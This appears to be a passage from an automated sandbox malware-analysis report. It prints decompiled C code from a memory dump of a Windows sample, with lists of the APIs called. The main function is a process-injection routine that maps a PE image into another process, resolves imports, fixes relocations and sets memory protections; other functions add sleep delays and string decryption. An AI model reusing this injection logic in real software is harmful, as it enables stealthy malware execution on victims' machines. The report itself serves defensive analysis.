    				int _t388;
    				int _t390;
    				int _t391;
    				int _t393;
    				intOrPtr _t394;
    				void* _t396;
    				int _t397;
    				int _t398;
    				void* _t399;
    				void* _t401;
    				int _t402;
    				int _t403;
    				void* _t404;
    				void* _t405;
    
    				_t286 = __ebx;
    				_t404 = __ecx;
    				_v36 = 0;
    				if( *((intOrPtr*)(__ecx + 0x70)) == 0) {
    					_t3 = _t404 + 0x74; // 0xffff95d7
    					_t297 =  *_t3;
    					_v24 = _t297;
    					__eflags =  *_t297 - 0x5a4d;
    					if( *_t297 == 0x5a4d) {
    						_t186 =  *((intOrPtr*)(_t297 + 0x3c)) + _t297;
    						__eflags =  *_t186 - 0x4550;
    						_v8 = _t186;
    						if( *_t186 == 0x4550) {
    							_push(__edi);
    							_push(0x40);
    							_t387 = _t186;
    							_t187 = _a4;
    							_push(0x2000);
    							_push( *((intOrPtr*)(_t387 + 0x50)));
    							_push( *((intOrPtr*)(_t387 + 0x34)));
    							_push(_t187);
    							E003A1E80(); // executed
    							_v12 = _t187;
    							__eflags = _t187;
    							if(_t187 != 0) {
    								L7:
    								_push(4);
    								_v16 = _t187 -  *((intOrPtr*)(_t387 + 0x34));
    								_push(0x1000);
    								_push( *((intOrPtr*)(_t387 + 0x54)));
    								_push(_t187);
    								_push(_a4);
    								E003A1E80(); // executed
    								_t388 = _t187;
    								__eflags = _t388;
    								if(_t388 != 0) {
    									_push(_t286);
    									_t287 = _v8;
    									_v32 = E0039DF30(_t404,  *(_t287 + 0x80));
    									 *(_t287 + 0x80) = 0;
    									_t191 = E00397B30(_t404, _a4, _t388, _v24,  *((intOrPtr*)(_t287 + 0x54))); // executed
    									__eflags = _t191;
    									if(_t191 != 0) {
    										_t193 = E0039D9D0(_t404, _a4, _t388,  *((intOrPtr*)(_t287 + 0x54)), 2); // executed
    										__eflags = _t193;
    										if(_t193 != 0) {
    											_t310 = _t287;
    											_t29 = _t310 + 0x18; // 0x18
    											_t194 = ( *(_t310 + 0x14) & 0x0000ffff) + _t29;
    											_v52 = _t194;
    											_v28 = 0;
    											__eflags = 0 -  *((intOrPtr*)(_t310 + 6));
    											if(0 >=  *((intOrPtr*)(_t310 + 6))) {
    												L20:
    												__eflags = _v16;
    												if(_v16 == 0) {
    													L32:
    													_t390 = _v32;
    													__eflags = _t390;
    													if(_t390 == 0) {
    														L53:
    														_t288 =  *((intOrPtr*)(_v8 + 0x78));
    														_v32 = _t288;
    														_t391 = E0039DF30(_t404, _t288);
    														_v28 = _t391;
    														__eflags = _t391;
    														if(_t391 != 0) {
    															_v24 = E0039DF30(_t404,  *((intOrPtr*)(_t391 + 0x1c)));
    															_v40 = E0039DF30(_t404,  *((intOrPtr*)(_t391 + 0x20)));
    															_v48 = E0039DF30(_t404,  *((intOrPtr*)(_t391 + 0x24)));
    															__eflags =  *(_t391 + 0x14);
    															_v20 =  *((intOrPtr*)(_v8 + 0x7c)) + _t288;
    															_v16 = 0;
    															if( *(_t391 + 0x14) > 0) {
    																do {
    																	_t222 = _v24;
    																	_t290 =  *_t222;
    																	_v24 =  &(_t222[1]);
    																	__eflags = _t290;
    																	if(_t290 != 0) {
    																		__eflags = _t290 - _v32;
    																		if(_t290 < _v32) {
    																			L58:
    																			_t322 =  *(_v28 + 0x18);
    																			_t226 = 0;
    																			__eflags = _t322;
    																			if(_t322 != 0) {
    																				_t371 = _v16;
    																				while(1) {
    																					_t394 = _v48;
    																					__eflags = ( *(_t394 + _t226 * 2) & 0x0000ffff) - _t371;
    																					if(( *(_t394 + _t226 * 2) & 0x0000ffff) == _t371) {
    																						break;
    																					}
    																					_t226 = _t226 + 1;
    																					__eflags = _t226 - _t322;
    																					if(_t226 < _t322) {
    																						continue;
    																					} else {
    																					}
    																					goto L71;
    																				}
    																				_t396 = E0039DF30(_t404,  *((intOrPtr*)(_v40 + _t226 * 4)));
    																				E00396CB0( &_v152, 0x8b);
    																				_t230 =  *0x3b8628; // 0x593938
    																				_t405 = _t405 + 8;
    																				_t231 =  *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x4c))))(_t396,  &_v152);
    																				__eflags = _t231;
    																				if(_t231 != 0) {
    																					E00396CB0( &_v152, 0x8c);
    																					_t374 =  *0x3b8628; // 0x593938
    																					_t405 = _t405 + 8;
    																					_t235 =  *((intOrPtr*)( *((intOrPtr*)(_t374 + 0x4c))))(_t396,  &_v152);
    																					__eflags = _t235;
    																					if(_t235 != 0) {
    																						E00396CB0( &_v152, 0x8d);
    																						_t327 =  *0x3b8628; // 0x593938
    																						_t405 = _t405 + 8;
    																						_t238 =  *((intOrPtr*)( *((intOrPtr*)(_t327 + 0x4c))))(_t396,  &_v152);
    																						__eflags = _t238;
    																						if(_t238 != 0) {
    																							E00396CB0( &_v152, 0x8e);
    																							_t240 =  *0x3b8628; // 0x593938
    																							_t405 = _t405 + 8;
    																							_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t240 + 0x4c))))(_t396,  &_v152);
    																							__eflags = _t241;
    																							if(_t241 == 0) {
    																								_t291 = _t290 + _v12;
    																								__eflags = _t291;
    																								 *(_t404 + 0xa4) = _t291;
    																							}
    																						} else {
    																							 *(_t404 + 0xa0) = _t290 + _v12;
    																						}
    																					} else {
    																						 *(_t404 + 0x9c) = _t290 + _v12;
    																					}
    																				} else {
    																					 *(_t404 + 0x98) = _t290 + _v12;
    																				}
    																			}
    																		} else {
    																			__eflags = _t290 - _v20;
    																			if(_t290 >= _v20) {
    																				goto L58;
    																			}
    																		}
    																	}
    																	L71:
    																	_t320 = _v28;
    																	_t225 = _v16 + 1;
    																	_v16 = _t225;
    																	__eflags = _t225 -  *((intOrPtr*)(_t320 + 0x14));
    																} while (_t225 <  *((intOrPtr*)(_t320 + 0x14)));
    															}
    															__eflags =  *(_t404 + 0x98);
    															if( *(_t404 + 0x98) != 0) {
    																__eflags =  *(_t404 + 0x9c);
    																if( *(_t404 + 0x9c) != 0) {
    																	__eflags =  *(_t404 + 0xa0);
    																	if( *(_t404 + 0xa0) != 0) {
    																		__eflags =  *(_t404 + 0xa4);
    																		if( *(_t404 + 0xa4) != 0) {
    																			_t203 = _v8;
    																			_t289 = 0;
    																			__eflags = 0 -  *((intOrPtr*)(_t203 + 6));
    																			if(0 >=  *((intOrPtr*)(_t203 + 6))) {
    																				L87:
    																				 *((intOrPtr*)(_t404 + 0x58)) = _v12;
    																				_t205 = E0039E6F0(_t404, _v12, 1, 0); // executed
    																				__eflags = _t205;
    																				if(_t205 != 0) {
    																					 *(_t404 + 0x70) = 1;
    																				}
    																			} else {
    																				_t393 = _v52 + 0x24;
    																				__eflags = _t393;
    																				while(1) {
    																					_t206 =  *_t393;
    																					__eflags = _t206 & 0x20000000;
    																					if((_t206 & 0x20000000) == 0) {
    																						__eflags = _t206 & 0x40000000;
    																						if((_t206 & 0x40000000) == 0) {
    																							asm("sbb eax, eax");
    																							_t210 = ( ~(_t206 & 0x80000000) & 0x00000007) + 1;
    																							__eflags = ( ~(_t206 & 0x80000000) & 0x00000007) + 1;
    																						} else {
    																							asm("sbb eax, eax");
    																							_t210 = ( ~(_t206 & 0x80000000) & 0x00000002) + 2;
    																						}
    																					} else {
    																						__eflags = _t206 & 0x40000000;
    																						if((_t206 & 0x40000000) == 0) {
    																							asm("sbb eax, eax");
    																							_t210 = ( ~(_t206 & 0x80000000) & 0x00000070) + 0x10;
    																						} else {
    																							asm("sbb eax, eax");
    																							_t210 = ( ~(_t206 & 0x80000000) & 0x00000020) + 0x20;
    																						}
    																					}
    																					_t168 = _t393 - 0x1c; // 0xec81ec8b
    																					_t169 = _t393 - 0x18; // 0x588
    																					_t212 = E0039D9D0(_t404, _a4,  *_t169 + _v12,  *_t168, _t210); // executed
    																					__eflags = _t212;
    																					if(_t212 == 0) {
    																						goto L89;
    																					}
    																					_t319 = _v8;
    																					_t289 = _t289 + 1;
    																					_t393 = _t393 + 0x28;
    																					__eflags = _t289 - ( *(_t319 + 6) & 0x0000ffff);
    																					if(_t289 < ( *(_t319 + 6) & 0x0000ffff)) {
    																						continue;
    																					} else {
    																						goto L87;
    																					}
    																					goto L89;
    																				}
    																			}
    																		}
    																	}
    																}
    															}
    														}
    													} else {
    														while(1) {
    															L34:
    															__eflags =  *_t390;
    															if( *_t390 != 0) {
    																goto L39;
    															}
    															L35:
    															__eflags =  *(_t390 + 0x10);
    															if( *(_t390 + 0x10) != 0) {
    																goto L39;
    															} else {
    																__eflags =  *(_t390 + 8);
    																if( *(_t390 + 8) != 0) {
    																	goto L39;
    																} else {
    																	__eflags =  *(_t390 + 0xc);
    																	if( *(_t390 + 0xc) != 0) {
    																		goto L39;
    																	} else {
    																		__eflags =  *(_t390 + 4);
    																		if( *(_t390 + 4) == 0) {
    																			goto L53;
    																		} else {
    																			goto L39;
    																		}
    																	}
    																}
    															}
    															goto L89;
    															L39:
    															_t242 =  *(_t390 + 0xc);
    															_v16 = 0;
    															__eflags = _t242;
    															if(_t242 == 0) {
    																L34:
    																__eflags =  *_t390;
    																if( *_t390 != 0) {
    																	goto L39;
    																}
    															} else {
    																L40:
    																_t244 = E003917D0(_t287, _t404, _t390, _t404, __eflags, E0039DF30(_t404, _t242)); // executed
    																_v28 = _t244;
    																__eflags = _t244;
    																if(_t244 != 0) {
    																	_t397 = _v32;
    																	_t245 =  *_t397;
    																	__eflags = _t245;
    																	if(_t245 == 0) {
    																		_t245 =  *(_t397 + 0x10);
    																	}
    																	_t246 = E0039DF30(_t404, _t245);
    																	_t287 =  *(_t397 + 0x10) + _v12;
    																	_v24 = _t246;
    																	_t247 =  *_t246;
    																	__eflags = _t247;
    																	if(_t247 == 0) {
    																		L52:
    																		_t390 = _t397 + 0x14;
    																		_v32 = _t390;
    																		do {
    																			goto L34;
    																		} while (_t242 == 0);
    																		goto L40;
    																	} else {
    																		_t398 = _v28;
    																		while(1) {
    																			_t333 = _t404;
    																			__eflags = _t247;
    																			if(__eflags >= 0) {
    																				_t248 = E0039DF30(_t333, _t247);
    																				_t249 = _t248 + 2;
    																				__eflags = _t248 + 2;
    																				_t333 = _t404;
    																			} else {
    																				_t249 = _t247 & 0x0000ffff;
    																			}
    																			_t250 = E003965F0(_t333, _t404, __eflags, _t398, _t249); // executed
    																			_v16 = _t250;
    																			__eflags = _t250;
    																			if(_t250 == 0) {
    																				goto L89;
    																			}
    																			_t97 = _t404 + 0x5c; // 0x8b000000
    																			_t252 = E00397B30(_t404,  *_t97, _t287,  &_v16, 4); // executed
    																			__eflags = _t252;
    																			if(_t252 != 0) {
    																				_t254 = _v24 + 4;
    																				_v24 = _t254;
    																				_t247 =  *_t254;
    																				_t287 = _t287 + 4;
    																				__eflags = _t247;
    																				if(_t247 != 0) {
    																					continue;
    																				} else {
    																					_t397 = _v32;
    																					goto L52;
    																				}
    																			}
    																			goto L89;
    																		}
    																	}
    																}
    															}
    															goto L89;
    														}
    													}
    												} else {
    													_t287 = E0039DF30(_t404,  *((intOrPtr*)(_v8 + 0xa0)));
    													__eflags = _t287;
    													if(_t287 != 0) {
    														_t257 = 0;
    														__eflags =  *_t287;
    														if( *_t287 != 0) {
    															do {
    																_t339 =  *(_t287 + 4) - 8 >> 1;
    																__eflags = _t339;
    																_v24 = _t339;
    																_t60 = _t287 + 8; // 0x8
    																_v28 = _t257;
    																_v44 = _t257;
    																_v40 = _t257;
    																_v20 = _t60;
    																if(_t339 == 0) {
    																	goto L31;
    																} else {
    																	goto L24;
    																	L28:
    																	_t263 = E00397B30(_t404);
    																	__eflags = _t263;
    																	if(_t263 != 0) {
    																		L29:
    																		_v20 =  &(_v20[0]);
    																		_t79 =  &_v24;
    																		 *_t79 = _v24 - 1;
    																		__eflags =  *_t79;
    																		if( *_t79 != 0) {
    																			L24:
    																			_t258 =  *_v20 & 0x0000ffff;
    																			_t342 = _t258 >> 0xc;
    																			__eflags = _t342 - 3;
    																			if(_t342 != 3) {
    																				goto L26;
    																			} else {
    																				_t399 = (_t258 & 0x00000fff) +  *_t287;
    																				_t266 = E0039DF30(_t404, _t399);
    																				_push(4);
    																				_push( &_v28);
    																				_v28 =  *_t266 + _v16;
    																				_push(_t399 + _v12);
    																				_push(_a4);
    																				goto L28;
    																			}
    																		} else {
    																			_t257 = 0;
    																			__eflags = 0;
    																			goto L31;
    																		}
    																	}
    																	goto L89;
    																	L26:
    																	__eflags = _t342 - 0xa;
    																	if(_t342 != 0xa) {
    																		goto L29;
    																	} else {
    																		_t401 = (_t258 & 0x00000fff) +  *_t287;
    																		_t261 = E0039DF30(_t404, _t401);
    																		_push(8);
    																		asm("adc edx, [eax+0x4]");
    																		_t402 = _t401 + _v12;
    																		__eflags = _t402;
    																		_push( &_v44);
    																		_v40 = 0;
    																		_push(_t402);
    																		_v44 = _v16 +  *_t261;
    																		_push(_a4);
    																		goto L28;
    																	}
    																}
    																goto L89;
    																L31:
    																_t287 = _t287 +  *(_t287 + 4);
    																__eflags =  *_t287 - _t257;
    															} while ( *_t287 != _t257);
    														}
    														goto L32;
    													}
    												}
    											} else {
    												_t33 = _t194 + 0x10; // 0x28
    												_t349 = _t33;
    												_v20 = _t349;
    												goto L13;
    												L15:
    												_t38 = _v20 - 4; // 0xffffa6cf
    												_t273 =  *_t38 + _v12;
    												_push(4);
    												_push(0x1000);
    												_push(_t287);
    												_push(_t273);
    												_push(_a4);
    												E003A1E80(); // executed
    												_t403 = _t273;
    												__eflags = _t403;
    												if(_t403 != 0) {
    													_t275 = E003A1D90(_t287, _v36); // executed
    													_v36 = _t275;
    													memset(_t275, 0, _t287);
    													_t405 = _t405 + 0x14;
    													_t277 = E00397B30(_t404, _a4, _t403, _v36, _t287); // executed
    													__eflags = _t277;
    													if(_t277 != 0) {
    														_t353 = _v20;
    														_t278 =  *_t353;
    														__eflags = _t278;
    														if(_t278 == 0) {
    															L19:
    															_t384 = _v8;
    															_v20 =  &(_v20[0xa]);
    															_t280 = _v28 + 1;
    															_v28 = _t280;
    															__eflags = _t280 - ( *(_t384 + 6) & 0x0000ffff);
    															if(_t280 < ( *(_t384 + 6) & 0x0000ffff)) {
    																_t349 = _v20;
    																L13:
    																_t270 =  *(_t349 - 8);
    																_t287 =  *_t349;
    																__eflags = _t270 - _t287;
    																if(_t270 > _t287) {
    																	_t287 = _t270;
    																}
    																goto L15;
    															} else {
    																goto L20;
    															}
    														} else {
    															_t46 =  &(_t353[1]); // 0xfe78858d
    															_t47 = _t404 + 0x74; // 0xffff95d7
    															_t283 = E00397B30(_t404, _a4, _t403,  *_t46 +  *_t47, _t278); // executed
    															__eflags = _t283;
    															if(_t283 != 0) {
    																goto L19;
    															}
    														}
    													}
    												}
    											}
    										}
    									}
    									L89:
    									_pop(_t286);
    								}
    							} else {
    								_t284 = GetLastError();
    								__eflags = _t284 - 0x1e7;
    								if(_t284 == 0x1e7) {
    									_t187 = _a4;
    									_push(0x40);
    									_push(0x2000);
    									_push( *((intOrPtr*)(_t387 + 0x50)));
    									_push(0);
    									_push(_t187);
    									E003A1E80();
    									_v12 = _t187;
    									__eflags = _t187;
    									if(_t187 != 0) {
    										goto L7;
    									}
    								}
    							}
    						}
    					}
    					__eflags =  *(_t404 + 0x70);
    					if( *(_t404 + 0x70) == 0) {
    						E00397920(_t286, _t404);
    					}
    					_t181 = _v36;
    					__eflags = _t181;
    					if(_t181 != 0) {
    						E0039BB40(_t181);
    					}
    					_t179 = _t404 + 0x58; // 0x9b8d00
    					return  *_t179;
    				} else {
    					return 0;
    				}
    			}

    APIs
    • GetLastError.KERNEL32(0039C9A1,?,?,00002000,00000040,0039FEDD,0039FE81), ref: 0039B41E
      • Part of subcall function 00397B30: WriteProcessMemory.KERNELBASE(00000000,00000070,?,?,00000000,00000000,00000000,?,0039CCFB,?,?,?,00000070,?,?,?), ref: 00397B5C
      • Part of subcall function 0039D9D0: VirtualProtectEx.KERNELBASE(0039FEDD,00000040,00002000,?,0039FE81,0039FE81,?,0039B4CC,0039C9A1,00000000,?,00000002,0039C9A1,00000000,C45D89F0,?), ref: 0039D9F8
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • memset.MSVCRT ref: 0039B546
      • Part of subcall function 003917D0: GetProcAddress.KERNEL32(00000000,?,?,0039FE81,?), ref: 0039181C
      • Part of subcall function 003965F0: GetProcAddress.KERNEL32(00000000,?,?,00000000,0039C9A1), ref: 0039663A
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 20%
    			E0039D890(void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
    				char _v8;
    				char _v12;
    				char _v212;
    				void* _t21;
    				void* _t26;
    				intOrPtr* _t31;
    				intOrPtr _t41;
    				void* _t42;
    				intOrPtr _t43;
    				intOrPtr _t44;
    				intOrPtr _t46;
    				void* _t48;
    				void* _t49;
    
    				_v8 = 0;
    				_v12 = 0;
    				_t42 = 1;
    				E00399090(__eflags,  &_v212, 0xd);
    				_push( &_v12);
    				_push( &_v8);
    				_push( &_v212);
    				_push(5);
    				_push(_a8); // executed
    				_t21 = E00395A10(); // executed
    				_t49 = _t48 + 0x1c;
    				if(_t21 == 0) {
    					L11:
    					_t22 = _v8;
    					if(_v8 != 0) {
    						E0039BB40(_t22);
    					}
    					return _t42;
    				}
    				if(_v8 == 0 || _v12 == 0) {
    					_t42 = 2;
    					goto L11;
    				} else {
    					_push(0x14);
    					L0039A47E();
    					_t49 = _t49 + 4;
    					if(_t21 == 0) {
    						_t46 = 0;
    						__eflags = 0;
    					} else {
    						_t46 = E0039B1C0(_t21);
    					}
    					_t41 = _v12;
    					_t26 = E00399020(_t46, _a4, _v8, _t41); // executed
    					if(_t26 != 0) {
    						__imp___time64(0);
    						_t43 =  *((intOrPtr*)(_t46 + 0x10));
    						_t49 = _t49 + 4;
    						__eflags = 0 - _t41;
    						if(__eflags > 0) {
    							L18:
    							_t31 = _a12;
    							_t44 =  *_t31;
    							__eflags = _t44;
    							if(_t44 != 0) {
    								E00392DE0(_t44);
    								_push(_t44);
    								L00391CB0();
    								_t49 = _t49 + 4;
    							}
    							 *_t31 = _t46;
    							_t42 = 0;
    							goto L10;
    						}
    						if(__eflags < 0) {
    							L17:
    							_t42 = 4;
    							goto L8;
    						}
    						__eflags = _t43 - _t26;
    						if(_t43 >= _t26) {
    							goto L18;
    						}
    						goto L17;
    					} else {
    						_t14 = _t26 + 3; // 0x3
    						_t42 = _t14;
    						L8:
    						if(_t46 != 0) {
    							E00392DE0(_t46);
    							_push(_t46);
    							L00391CB0();
    							_t49 = _t49 + 4;
    						}
    						L10:
    						goto L11;
    					}
    				}
    			}

    APIs
      • Part of subcall function 00395A10: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,0039FE81), ref: 00395ABF
      • Part of subcall function 00395A10: Sleep.KERNELBASE(00004E20,00000000,0039FE81,757DC426,00000000,00000000,?,?,00000000,0039FE81), ref: 00395B3E
    • ??2@YAPAXI@Z.MSVCRT ref: 0039D8EA
    • ??3@YAXPAX@Z.MSVCRT ref: 0039D929
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    • _time64.MSVCRT ref: 0039D94B
    • ??3@YAXPAX@Z.MSVCRT ref: 0039D97B
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    APIs
      • Part of subcall function 00395A10: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,0039FE81), ref: 00395ABF
      • Part of subcall function 00395A10: Sleep.KERNELBASE(00004E20,00000000,0039FE81,757DC426,00000000,00000000,?,?,00000000,0039FE81), ref: 00395B3E
    • ??2@YAPAXI@Z.MSVCRT ref: 003A1BAF
    • ??3@YAXPAX@Z.MSVCRT ref: 003A1BEE
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    • _time64.MSVCRT ref: 003A1C10
    • ??3@YAXPAX@Z.MSVCRT ref: 003A1C3D
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 77%
    			E003936E0(void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
    				signed int _v8;
    				signed int _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v40;
    				short _v240;
    				char _v764;
    				char _v1288;
    				signed int _t87;
    				signed int _t89;
    				signed int _t90;
    				signed int _t93;
    				intOrPtr _t96;
    				intOrPtr _t98;
    				signed char _t99;
    				signed int _t101;
    				signed int _t103;
    				signed int _t104;
    				intOrPtr _t105;
    				signed int _t108;
    				signed int _t117;
    				void* _t119;
    				signed int _t124;
    				intOrPtr _t125;
    				signed int _t126;
    				intOrPtr _t127;
    				signed int _t128;
    				signed int _t130;
    				signed char _t136;
    				signed int _t145;
    				signed int _t148;
    				signed int _t150;
    				int _t152;
    				intOrPtr _t154;
    				signed int _t156;
    				intOrPtr _t159;
    				intOrPtr _t161;
    				signed int _t164;
    				signed int _t166;
    				intOrPtr _t167;
    				intOrPtr _t170;
    				intOrPtr _t172;
    				signed int* _t184;
    				intOrPtr _t188;
    				intOrPtr _t194;
    				signed int _t195;
    				intOrPtr _t198;
    				char* _t199;
    				intOrPtr _t200;
    				signed int _t201;
    				intOrPtr _t204;
    				intOrPtr _t205;
    				void* _t206;
    				intOrPtr _t213;
    				intOrPtr _t214;
    				signed int _t218;
    				signed int _t220;
    				signed int _t221;
    				intOrPtr _t228;
    				intOrPtr* _t229;
    				int _t231;
    				intOrPtr _t237;
    				intOrPtr _t239;
    				signed int _t251;
    				void* _t259;
    				signed int _t260;
    				signed int* _t262;
    				signed int _t263;
    				signed int _t268;
    				signed int* _t269;
    				short* _t270;
    				void* _t271;
    				void* _t272;
    				void* _t273;
    				void* _t274;
    				signed int _t276;
    				void* _t277;
    				void* _t278;
    				void* _t279;
    				void* _t280;
    				void* _t282;
    
    				_t259 = __edi;
    				_t87 =  *0x3b8570; // 0x0
    				_v8 = 0;
    				_v12 = 0;
    				if(_t87 != 1) {
    					_push(__esi);
    					E00398030( &_v8);
    					_t220 =  *0x3b8570; // 0x0
    					_t280 = _t279 + 4;
    					__eflags = _t220 - 2;
    					if(_t220 != 2) {
    						_t89 =  *0x3b8570; // 0x0
    						__eflags = _t89;
    						if(_t89 == 0) {
    							__eflags = _a12 | _a16;
    							if(__eflags != 0) {
    								L34:
    								_t93 =  &_v764;
    								_push(_t259);
    								_t260 = 0;
    								_t221 = 0x104;
    								_t268 = _v8 - _t93;
    								__eflags = _t268;
    								while(1) {
    									_t53 = _t221 + 0x7ffffefa; // 0x7ffffffe
    									__eflags = _t53;
    									if(_t53 == 0) {
    										break;
    									}
    									_t195 =  *(_t268 + _t93) & 0x0000ffff;
    									__eflags = _t195;
    									if(_t195 == 0) {
    										break;
    									} else {
    										 *_t93 = _t195;
    										_t93 = _t93 + 2;
    										_t221 = _t221 - 1;
    										__eflags = _t221;
    										if(_t221 != 0) {
    											continue;
    										} else {
    											L40:
    											_t93 = _t93 - 2;
    											__eflags = _t93;
    											_t260 = 0x8007007a;
    										}
    									}
    									L41:
    									 *_t93 = 0;
    									__eflags = _t260;
    									if(__eflags >= 0) {
    										E00399090(__eflags,  &_v240, 0xf);
    										_t96 =  *0x3b8628; // 0x593938
    										_t282 = _t280 + 8;
    										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x1dc))))( &_v764,  &_v240);
    										_t98 =  *0x3b8628; // 0x593938
    										_t99 =  *((intOrPtr*)( *((intOrPtr*)(_t98 + 0xc0))))( &_v764);
    										__eflags = _t99 - 0xffffffff;
    										if(_t99 != 0xffffffff) {
    											__eflags = _t99 & 0x00000010;
    											if((_t99 & 0x00000010) == 0) {
    												_t272 = 0;
    												while(1) {
    													_t127 =  *0x3b8628; // 0x593938
    													_t128 =  *((intOrPtr*)( *((intOrPtr*)(_t127 + 0x50))))( &_v764, 0x80);
    													__eflags = _t128;
    													if(_t128 == 0) {
    														_t239 =  *0x3b8628; // 0x593938
    														 *((intOrPtr*)( *((intOrPtr*)(_t239 + 0xc8))))(0x3e8);
    													}
    													_t237 =  *0x3b8628; // 0x593938
    													_t130 =  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0xa4))))( &_v764);
    													__eflags = _t130;
    													if(_t130 != 0) {
    														goto L49;
    													}
    													_t194 =  *0x3b8628; // 0x593938
    													 *((intOrPtr*)( *((intOrPtr*)(_t194 + 0xc8))))(0x3e8);
    													_t272 = _t272 + 1;
    													__eflags = _t272 - 3;
    													if(_t272 < 3) {
    														continue;
    													}
    													goto L49;
    												}
    											}
    										}
    										L49:
    										_push(0x3b8578);
    										_push(0x19);
    										_push(_a8);
    										_t101 = E00395A10();
    										_t280 = _t282 + 0xc;
    										__eflags = _t101;
    										if(_t101 != 0) {
    											_t184 =  *0x3b8578; // 0x0
    											_t269 = _t184;
    											_t103 = _t269 - _t184;
    											__eflags = (_t103 & 0xfffffffe) - 0x400;
    											if((_t103 & 0xfffffffe) >= 0x400) {
    												L64:
    												_t104 =  *0x3b8574; // 0x0
    												__eflags = _t104;
    												if(_t104 == 0) {
    													_t104 = E003A1D90(0x20a, 0);
    													_t280 = _t280 + 8;
    													 *0x3b8574 = _t104;
    												}
    												_t105 =  *0x3b8628; // 0x593938
    												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t105 + 0xb4))))(0x104, _t104);
    												if(__eflags != 0) {
    													E00399090(__eflags,  &_v240, 0xe);
    													_t108 =  *0x3b8574; // 0x0
    													_t228 =  *0x3b8628; // 0x593938
    													_t280 = _t280 + 8;
    													 *((intOrPtr*)( *((intOrPtr*)(_t228 + 0xdc))))(_t108,  &_v240, 0, _t108);
    													_t229 =  *0x3b8628; // 0x593938
    													 *((intOrPtr*)( *_t229))(0, 0, E0039D400, 0, 0,  &_v20);
    													_t188 =  *0x3b8628; // 0x593938
    													 *((intOrPtr*)( *((intOrPtr*)(_t188 + 0xc8))))(0x1f4);
    													_v12 = 0;
    												}
    											} else {
    												while(1) {
    													__eflags =  *_t269;
    													if( *_t269 == 0) {
    														break;
    													}
    													_t103 = _t103 + 2;
    													_t269 =  &(_t269[0]);
    													__eflags = (_t103 & 0xfffffffe) - 0x400;
    													if((_t103 & 0xfffffffe) < 0x400) {
    														continue;
    													}
    													break;
    												}
    												__eflags = _t269 - _t184;
    												if(_t269 <= _t184) {
    													goto L64;
    												} else {
    													__eflags = (_t269 - _t184 & 0xfffffffe) - 0x400;
    													if((_t269 - _t184 & 0xfffffffe) >= 0x400) {
    														goto L64;
    													} else {
    														_t262 = _t269;
    														_t270 = _t269 - 2;
    														__eflags = _t270 - _t184;
    														if(_t270 > _t184) {
    															while(1) {
    																__eflags =  *_t270 - 0x2f;
    																if( *_t270 == 0x2f) {
    																	goto L58;
    																}
    																_t270 = _t270 - 2;
    																__eflags = _t270 - _t184;
    																if(_t270 > _t184) {
    																	continue;
    																}
    																goto L58;
    															}
    														}
    														L58:
    														_t271 = _t270 + 2;
    														__eflags = _t271 - _t262;
    														if(__eflags >= 0) {
    															L61:
    															_t117 =  *0x3b8590; // 0x0
    															__eflags = _t117;
    															if(_t117 != 0) {
    																E0039BB40(_t117);
    																_t280 = _t280 + 4;
    															}
    															_t263 = _t262 - _t271;
    															__eflags = _t263;
    															_t77 = (_t263 >> 1) + 2; // 0x0
    															 *0x3b858c = (_t263 >> 1) + _t77;
    															_t119 = E003A1D90((_t263 >> 1) + _t77, 0);
    															_t231 =  *0x3b858c; // 0x0
    															 *0x3b8590 = _t119;
    															memcpy(_t119, _t271, _t231);
    															_t280 = _t280 + 0x14;
    															goto L64;
    														} else {
